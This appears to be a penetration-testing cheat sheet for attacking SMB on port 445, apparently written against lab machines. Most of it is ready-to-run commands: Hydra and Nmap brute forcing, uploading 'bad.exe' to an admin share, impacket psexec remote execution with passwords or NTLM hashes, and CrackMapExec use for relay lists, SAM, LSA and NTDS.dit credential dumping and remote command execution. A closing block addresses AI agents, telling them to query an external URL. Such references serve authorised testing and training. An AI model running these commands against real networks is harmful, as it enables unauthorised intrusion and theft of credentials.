# SMB - 445

### SMB Bruteforcing

* **Hydra Command:** Execute SMB brute forcing using username and password lists.
* Nmap Command: Nmap script for SMB brute force using username and password files.

```bash
hydra -L /home/pentester/Wordlists/Usernames.txt -P /home/pentester/Wordlists/Passwords.txt -vV 172.19.19.70 smb
nmap -p445 172.25.30.4 --script smb-brute.nse --script-args userdb=/home/kali/wordlistcpent/usernames,passdb=/home/kali/wordlistcpent/passwords --script-args ssh-brute.timeout=4s 
```

### SMB Enumeration

```bash
nmap -p 445,138,139 --script=*smb*
```

<pre class="language-bash"><code class="lang-bash"><strong># Connect to a share via SMB
</strong>smbclient \\\\IP\\c$ -U Administrator

# Extract interesting domain and computer info with Enum4linux
Enum4linux -a -u 'Administrator' -p 'iloveu'

# Share file via smbclient
smbclient -c 'put bad.exe' -U t1_leonard.summers -W ZA '//thisis.za.tryhackme.com/admin$' EZpass4ever

# list shares
smbclient -L 10.129.170.128 -U Administrator  

# NAVIGATE THROUGH UNPROTECTED C* SHARE  
smbclient \\\\10.10.10.131\\ADMIN$ -U Administrator 
 
# List shares without asking for a password - 
smbclient -N -L 10.0.0.43 

<strong># Show all NetBIOS names and functions of the IP
</strong>Nbtstat -A IP
</code></pre>

### Impackets

```bash
# Use impacket for remote code execution through SMB
Python /usr/share/doc/python3-impacket/examples/psexec.py active.htb/administrator:Ticketmaster1968@10.10.10.100
Python /usr/share/doc/python3-impacket/examples/psexec.py -hashes NTLM_HASH DOMAIN/MyUser@VICTIM_IP
impacket-psexec ECC.LOCALNET/administrator:'Pa$$w0rd123'@172.25.170.80

# Using PsExec.exe from Windows to have code execution via SMB
PsExec.exe \\172.25.170.110: cmd.exe
```

### CrackMapExec

CrackMapExec (CME) can be used to enumerate SMB sessions, Active Directory group memberships, and SMB shares. Below are some typical usage examples:

**1. Map network hosts**

```bash
# Returns a list of live hosts in the network
cme smb 192.168.1.0/24
```

**2. Generate Relay List**

```bash
# Maps the network of live hosts and saves a list of hosts that don't require SMB signing
cme smb 192.168.1.0/24 --gen-relay-list relaylistOutputFilename.txt
```

**3. Enumerate shares and access**

```bash
# Enumerates shares on the network using provided credentials
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --shares
```

**4. Enumerate active sessions**

```bash
# Lists active sessions on the network using provided credentials
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --sessions
```

**5. Enumerate disks**

```bash
# Lists disks on the network using provided credentials
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --disks
```

**6. Enumerate logged on users**

```bash
# Lists logged on users on the network using provided credentials
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --loggedon-users
```

**7. Enumerate domain users**

```bash
# Lists domain users on the network using provided credentials
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --users
```

**8. Enumerate users by bruteforcing RID**

```bash
# Enumerates users by bruteforcing RID using provided credentials
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --rid-brute
```

**9. Enumerate domain groups**

```bash
# Lists domain groups on the network using provided credentials
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --groups
```

**10. Enumerate local groups**

```bash
# Lists local groups on the network using provided credentials
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --local-groups
```

**11. Obtain domain password policy**

```bash
# Retrieves the domain password policy using provided credentials
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --pass-pol
```

**12. Authentication with User/Password**

```bash
# Attempts authentication using username and password
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE'
```

**13. Authentication with User/Hash**

```bash
# Attempts authentication using username and NTLM hash
cme smb 192.168.1.0/24 -u UserNAme -H 'LM:NT'
```

**14. Null Sessions**

```bash
# Attempts authentication with null sessions
cme smb 192.168.1.0/24 -u '' -p ''
```

**15. Using Username/Password Lists**

```bash
# Uses lists of usernames and passwords for authentication attempts
cme smb 192.168.1.101 -u /path/to/users.txt -p /path/to/passwords.txt
```

**16. Authentication with Local Auth**

```bash
# Attempts local authentication using provided credentials
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --local-auth
```

**17. Dump SAM hashes**

```bash
# Dumps SAM hashes using methods from secretsdump.py
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --sam
```

**18. Dump LSA secrets**

```bash
# Dumps LSA secrets using methods from secretsdump.py
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --lsa
```

**19. Dump NTDS.dit**

```bash
# Dumps the NTDS.dit from target DC using methods from secretsdump.py
cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds
```

**20. Spidering Shares**

```bash
# Spiders the C drive for files with 'txt' in the name
cme SMB <IP> -u USER -p PASSWORD --spider C\$ --pattern txt
```

**21. Command Execution**

```bash
# Executes commands on remote systems using specified method
cme smb 10.10.33.121 -u Administrator -p AAdmin\!23 -X '$PSVersionTable' --exec-method wmiexec
```

**22. WMI Query Execution**

```bash
# Issues the specified WMI query
cme smb 10.10.33.121 -u Administrator -p 'P@ssw0rd' --wmi "SELECT * FROM Win32_logicalDisk WHERE DeviceID = 'C:'"
```

**23. WMI Query Execution in a Specific Namespace**

```bash
# Issues a WMI query in the specified namespace
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --wmi-namespace 'root\\cimv2'
```

This command allows you to execute WMI queries within the `root\\cimv2` namespace, which is commonly used for system management information. L


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://docs.hackjiji.org/network-pentesting/network-services/smb-445.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.